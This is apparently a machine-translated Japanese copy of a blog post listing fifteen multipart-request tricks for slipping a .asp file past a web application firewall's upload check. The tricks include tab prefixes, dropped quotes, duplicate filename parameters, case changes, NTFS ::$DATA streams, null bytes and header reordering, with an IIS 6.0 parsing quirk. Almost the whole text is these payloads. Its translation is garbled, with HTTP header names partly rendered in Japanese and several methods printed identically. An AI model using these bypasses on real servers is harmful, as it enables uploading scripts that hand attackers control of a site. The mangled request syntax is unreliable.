オリジナルリンク:https://www.cesafe.com/8411.html
元の要求パケット:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ; 名前=」ファイルパス」; ファイル名= 「cesafe.asp」 コンテンツ -タイプ:text / htmlの
1、ファイル名のプレフィックスプラス[0x09の]バイパス:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ; 名前=」ファイルパス」; ファイル名=」[ 0x09の] cesafe.asp」 コンテンツ -タイプ:text / htmlの
方法2、二重引用符のバイパスを削除するファイル名:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ; 名前=」ファイルパス」; ファイル名= cesafe.aspの コンテンツ -タイプ:text / htmlの
方法3は、ファイル名1ファイル名パラメータを追加し、バイパスを割り当てます。
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ; 名前=」ファイルパス」; ファイル名=」cesafe.asp」;ファイル名1 = 『test.jpg』 コンテンツ -タイプ:text / htmlの
。方法4は、変数に形成F + ORM組成バイパス:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:F + ORM-データ; 名前=」ファイルパス」;ファイル名= 『cesafe.asp』 コンテンツ -タイプ:text / htmlの
方法5は、ファイル名の接尾辞は、ケースをバイパス:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ。名前=」ファイルパス」; ファイル名= 「cesafe.Asp」 コンテンツ -タイプ:text / htmlの
前記方法は、削除するフォームデータ変数バイパス:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:名前は=」ファイルパス」; ファイル名= 「cesafe.asp」 コンテンツ -タイプ:text / htmlの
7の方法であって、コンテンツの廃棄:スペースまたは複数の添加後、フォームデータ、バイパス・スペースの複数の添加後:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ。名前=」ファイルパス」; ファイル名= 「cesafe.asp」 コンテンツ -タイプ:text / htmlの
。方法8、cesafe.asp(スペース+)はバイパス:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ。名前=」ファイルパス」; ファイル名= 「cesafe.asp」 コンテンツ -タイプ:text / htmlの
方法9、「キャリッジリターンライン、バイパス:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ。名前=」ファイルパス」; ファイル名= 「cesafe.asp」 コンテンツ -タイプ:text / htmlの
方法10、NTFSはファイル名に加えて、ストリーム:: $データバイパス:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ。名前=」ファイルパス」; ファイル名=」cesafe.asp :: $ DATA」のContent-Type:テキスト/ htmlの OR --WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ; 名前=」ファイルパス」; ファイル名=」cesafe.asp :: $ DATAの\ 0x00での\のfuck.asp0x00.jpg」 コンテンツ -タイプ:text / htmlの
11は、IIS 6.0のテストを発見した後、それは常に最初の受信パラメータとしてContent-処分の値をとり、およびセキュリティの犬の値は常に受信機としてのContent-処分パラメータで最後のものです。従って、以下の構成[成功アップロードcesafe.asp]を要求しようとします。
コンテンツディスポジション:フォームデータ; 名前=」FileUploadName」。ファイル名=」cesafe.asp」---------- 15377259221471 コンテンツ -Disposition:フォームデータ; 名前=」FileUploadName」。ファイル名= 「cesafe.txt」 コンテンツ -タイプ:アプリケーション/ octet- ストリーム コンテンツ -Disposition:フォームデータ; 名前=」FileUploadName」。ファイル名= 「cesafe.asp」 コンテンツ -Disposition:フォームデータ; 名前=」FileUploadName」。ファイル名=」cesafe.asp」
12の方法は、Content-TypeとContent-Dispositionバイパス位置の順序を逆:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -タイプ:テキスト/ HTMLの コンテンツ -Disposition:フォームデータ; 名前=」ファイルパス」; ファイル名=」cesafe.asp」
13の方法であって、ファイル名プレフィックススペース(Tabキーは、代わりに)バイパス:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ; 名前=」ファイルパス」; ファイル名= 「cesafe.asp」 コンテンツ -タイプ:text / htmlの
14の方法、フォームデータのバイパス・スペースの前に:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:フォームデータ;名=」アップロードされました」。ファイル名= 「cesafe.asp」 コンテンツ -タイプ:text / htmlの
15.方法における前またはフォームデータに加えた後、+バイパス:
--WebKitFormBoundary2smpsxFB3D0KbA7D コンテンツ -Disposition:+フォームデータ; 名前=」ファイルパス」; ファイル名= 「cesafe.asp」 コンテンツ -タイプ:text / htmlの